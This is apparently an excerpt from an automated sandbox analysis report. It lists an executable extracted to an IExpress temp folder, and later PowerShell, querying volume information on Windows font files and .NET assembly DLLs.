Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
